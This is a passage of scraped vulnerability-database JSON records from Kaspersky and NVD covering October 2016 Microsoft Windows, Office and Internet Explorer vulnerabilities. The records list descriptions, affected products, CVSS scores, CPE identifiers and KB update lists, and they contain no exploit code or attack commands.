\n[CVE-2016-7182](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7182>) \n[CVE-2016-3376](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3376>) \n[CVE-2016-3267](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3267>) \n[CVE-2016-3266](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3266>) \n[CVE-2016-3384](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3384>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2016-3270](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3270>)0.0Unknown \n[CVE-2016-3263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3263>)0.0Unknown \n[CVE-2016-3209](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3209>)0.0Unknown \n[CVE-2016-3262](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3262>)0.0Unknown \n[CVE-2016-7182](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7182>)0.0Unknown \n[CVE-2016-3396](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3396>)0.0Unknown \n[CVE-2016-3393](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3393>)0.0Unknown \n[CVE-2016-3298](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3298>)0.0Unknown \n[CVE-2016-3267](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3267>)0.0Unknown \n[CVE-2016-3391](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3391>)0.0Unknown \n[CVE-2016-3385](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3385>)0.0Unknown \n[CVE-2016-3384](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3384>)0.0Unknown \n[CVE-2016-3382](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3382>)0.0Unknown \n[CVE-2016-3376](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3376>)0.0Unknown \n[CVE-2016-3266](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3266>)0.0Unknown \n[CVE-2016-0070](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0070>)0.0Unknown \n[CVE-2016-0142](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0142>)0.0Unknown \n[CVE-2016-7211](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7211>)0.0Unknown \n[CVE-2016-7185](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7185>)0.0Unknown\n\n### *KB list*:\n[3183431](<http://support.microsoft.com/kb/3183431>) \n[3191203](<http://support.microsoft.com/kb/3191203>) \n[3191256](<http://support.microsoft.com/kb/3191256>) \n[3185330](<http://support.microsoft.com/kb/3185330>) \n[3193515](<http://support.microsoft.com/kb/3193515>) \n[3192391](<http://support.microsoft.com/kb/3192391>) \n[3191492](<http://support.microsoft.com/kb/3191492>)\n\n### *Microsoft official advisories*:", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2016-10-11T00:00:00", "id": "KLA11906", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11906", "title": "\r KLA11906Multiple vulnerabilities for Microsoft Products (ESU) ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:41:57", "bulletinFamily": "info", "cvelist": ["CVE-2016-3209", "CVE-2016-3396", "CVE-2016-3263", "CVE-2016-7182", "CVE-2016-7193", "CVE-2016-3262"], "description": "### *Detect date*:\n10/11/2016\n\n### *Severity*:\nHigh\n\n### *Description*:\nAn improper RTF handling was found in Microsoft Office. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited remotely via a specially designed file.\n\n### *Affected products*:\nMicrosoft Word 2007 Service Pack 3 \nMicrosoft Office 2010 Service Pack 2 \nMicrosoft Word 2013 Service Pack 1 \nMicrosoft Office 2013 RT Service Pack 1 \nMicrosoft Word 2016 \nMicrosoft Word for Mac 2011 \nMicrosoft Word 2016 for Mac \nMicrosoft Office Compatibility Pack Service Pack 3 \nMicrosoft Word Viewer \nSharePoint Server 2010 Service Pack 2 \nSharePoint Server 2013 Service Pack 1 \nMicrosoft Office Web Apps 2010 Service Pack 2 \nMicrosoft Office Web Apps 2013 Service Pack 1 \nOffice Online Server\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2016-3263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3263>) \n[CVE-2016-3209](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3209>) \n[CVE-2016-3262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3262>) \n[CVE-2016-7182](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-7182>) \n[CVE-2016-3396](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3396>) \n[CVE-2016-7193](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-7193>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Office](<https://threats.kaspersky.com/en/product/Microsoft-Office/>)\n\n### *CVE-IDS*:\n[CVE-2016-3263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3263>)0.0Unknown \n[CVE-2016-3209](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3209>)0.0Unknown \n[CVE-2016-3262](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3262>)0.0Unknown \n[CVE-2016-7182](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7182>)0.0Unknown \n[CVE-2016-3396](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3396>)0.0Unknown \n[CVE-2016-7193](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7193>)9.3Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[3118394](<http://support.microsoft.com/kb/3118394>) \n[3189647](<http://support.microsoft.com/kb/3189647>) \n[3118348](<http://support.microsoft.com/kb/3118348>) \n[3118317](<http://support.microsoft.com/kb/3118317>) \n[3188399](<http://support.microsoft.com/kb/3188399>) \n[3188397](<http://support.microsoft.com/kb/3188397>) \n[3118327](<http://support.microsoft.com/kb/3118327>) \n[3188400](<http://support.microsoft.com/kb/3188400>) \n[3118301](<http://support.microsoft.com/kb/3118301>) \n[3127898](<http://support.microsoft.com/kb/3127898>) \n[3193438](<http://support.microsoft.com/kb/3193438>) \n[3118331](<http://support.microsoft.com/kb/3118331>) \n[3127897](<http://support.microsoft.com/kb/3127897>) \n[3118360](<http://support.microsoft.com/kb/3118360>) \n[3118307](<http://support.microsoft.com/kb/3118307>) \n[3118311](<http://support.microsoft.com/kb/3118311>) \n[3193442](<http://support.microsoft.com/kb/3193442>) \n[3118312](<http://support.microsoft.com/kb/3118312>) \n[3118377](<http://support.microsoft.com/kb/3118377>) \n[3118384](<http://support.microsoft.com/kb/3118384>) \n[3118352](<http://support.microsoft.com/kb/3118352>) \n[3118308](<http://support.microsoft.com/kb/3118308>) \n[3118345](<http://support.microsoft.com/kb/3118345>)\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).", "edition": 42, "modified": "2020-06-18T00:00:00", "published": "2016-10-11T00:00:00", "id": "KLA10884", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10884", "title": "\r KLA10884Code execution vulnerability in Microsoft Office ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:45:08", "bulletinFamily": "info", "cvelist": ["CVE-2016-3209"], "description": "### *Detect date*:\n10/11/2016\n\n### *Severity*:\nWarning\n\n### *Description*:\nAn information disclosure vulnerability was found in Microsoft Products. Malicious users can exploit this vulnerability to obtain sensitive information.\n\n### *Affected products*:\nSilverlight 5 \nWindows Vista Service Pack 2 \nWindows Server 2008 Service Pack 2 \nWindows 7 Service Pack 1 \nWindows Server 2008 R2 Service Pack 1 \nWindows 8.1 \nWindows Server 2012 \nWindows Server 2012 R2 \nWindows RT 8.1 \nWindows 10 \nWindows 10 1511, 1607 \n.NET Framework versions 3.0 SP2, 3.5, 3.5.1, 4.5.2 and 4.6 \nOffice 2007 Service Pack 3 \nOffice 2010 Service Pack 2 \nWord Viewer \nSkype for Business 2016 \nLync 2013 Service Pack 1 \nLync 2010 \nLive Meeting 2007 Console\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2016-3209](<https://nvd.nist.gov/vuln/detail/CVE-2016-3209>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Microsoft .NET Framework](<https://threats.kaspersky.com/en/product/Microsoft-.NET-Framework/>)\n\n### *CVE-IDS*:\n[CVE-2016-3209](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3209>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[3192441](<http://support.microsoft.com/kb/3192441>) \n[3194798](<http://support.microsoft.com/kb/3194798>) \n[3192440](<http://support.microsoft.com/kb/3192440>) \n[3188735](<http://support.microsoft.com/kb/3188735>) \n[3188732](<http://support.microsoft.com/kb/3188732>) \n[3188730](<http://support.microsoft.com/kb/3188730>) \n[3188731](<http://support.microsoft.com/kb/3188731>) \n[3189040](<http://support.microsoft.com/kb/3189040>) \n[3193713](<http://support.microsoft.com/kb/3193713>) \n[3189051](<http://support.microsoft.com/kb/3189051>) \n[3189052](<http://support.microsoft.com/kb/3189052>) \n[3188726](<http://support.microsoft.com/kb/3188726>) \n[3189039](<http://support.microsoft.com/kb/3189039>) \n[3188743](<http://support.microsoft.com/kb/3188743>) \n[3188741](<http://support.microsoft.com/kb/3188741>) \n[3188740](<http://support.microsoft.com/kb/3188740>)\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).", "edition": 42, "modified": "2020-07-22T00:00:00", "published": "2016-10-11T00:00:00", "id": "KLA10883", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10883", "title": "\r KLA10883OSI vulnerability in Microsoft Products ", "type": "kaspersky", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2020-10-03T12:10:50", "description": "The kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold, 1511, and 1607 allow local users to gain privileges via a crafted application, aka \"Win32k Elevation of Privilege Vulnerability.\" a different vulnerability than CVE-2016-3266, CVE-2016-3376, and CVE-2016-7185.", "edition": 3, "cvss3": {"exploitabilityScore": 1.3, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.3, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-14T02:59:00", "title": "CVE-2016-7211", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7211"], "modified": "2018-10-12T22:14:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_vista:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2016-7211", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7211", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:10:50", "description": "The Standard Collector Service in Windows Diagnostics Hub in Microsoft Windows 10 Gold, 1511, and 1607 mishandles library loading, which allows local users to gain privileges via a crafted application, aka \"Windows Diagnostics Hub Elevation of Privilege Vulnerability.\"", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-14T02:59:00", "title": "CVE-2016-7188", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7188"], "modified": "2018-10-12T22:14:00", "cpe": ["cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1511"], "id": "CVE-2016-7188", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7188", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:10:44", "description": "Graphics Device Interface (aka GDI or GDI+) in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; Windows 10 Gold, 1511, and 1607; Office 2007 SP3; Office 2010 SP2; Word Viewer; Skype for Business 2016; Lync 2013 SP1; Lync 2010; Lync 2010 Attendee; and Live Meeting 2007 Console allows remote attackers to bypass the ASLR protection mechanism via unspecified vectors, aka \"GDI+ Information Disclosure Vulnerability,\" a different vulnerability than CVE-2016-3263.", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-10-14T02:59:00", "title": "CVE-2016-3262", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3262"], "modified": "2018-10-12T22:12:00", "cpe": ["cpe:/a:microsoft:word_viewer:-", "cpe:/a:microsoft:lync:2013", "cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/a:microsoft:office:2007", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/a:microsoft:office:2010", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/a:microsoft:live_meeting:2007", "cpe:/a:microsoft:lync:2010", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:-", "cpe:/a:microsoft:skype_for_business:2016"], "id": "CVE-2016-3262", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3262", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:word_viewer:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:lync:2013:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2010:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2007:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:live_meeting:2007:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:lync:2010:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:lync:2010:*:attendee:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:skype_for_business:2016:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:10:44", "description": "The Graphics component in the kernel in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607 allows local users to gain privileges via a crafted application, aka \"Win32k Elevation of Privilege Vulnerability.\"", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-14T02:59:00", "title": "CVE-2016-3270", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3270"], "modified": "2018-10-12T22:12:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_vista:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2016-3270", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3270", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:10:44", "description": "Graphics Device Interface (aka GDI or GDI+) in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; Windows 10 Gold, 1511, and 1607; Office 2007 SP3; Office 2010 SP2; Word Viewer; Skype for Business 2016; Lync 2013 SP1; Lync 2010; Lync 2010 Attendee; and Live Meeting 2007 Console allows remote attackers to bypass the ASLR protection mechanism via unspecified vectors, aka \"GDI+ Information Disclosure Vulnerability,\" a different vulnerability than CVE-2016-3262.", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-10-14T02:59:00", "title": "CVE-2016-3263", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3263"], "modified": "2018-10-12T22:12:00", "cpe": ["cpe:/a:microsoft:word_viewer:-", "cpe:/a:microsoft:lync:2013", "cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/a:microsoft:office:2007", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/a:microsoft:office:2010", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/a:microsoft:live_meeting:2007", "cpe:/a:microsoft:lync:2010", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:-", "cpe:/a:microsoft:skype_for_business:2016"], "id": "CVE-2016-3263", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3263", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:word_viewer:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:lync:2013:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2010:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2007:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:live_meeting:2007:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:lync:2010:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:lync:2010:*:attendee:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:skype_for_business:2016:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:10:44", "description": "Microsoft Internet Explorer 9 through 11 and the Internet Messaging API in Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allow remote attackers to determine the existence of arbitrary files via a crafted web site, aka \"Internet Explorer Information Disclosure Vulnerability.\"", "edition": 3, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-10-14T02:59:00", "title": "CVE-2016-3298", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3298"], "modified": "2018-10-12T22:12:00", "cpe": ["cpe:/o:microsoft:windows_vista:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/a:microsoft:internet_explorer:10", "cpe:/o:microsoft:windows_server_2008:r2", 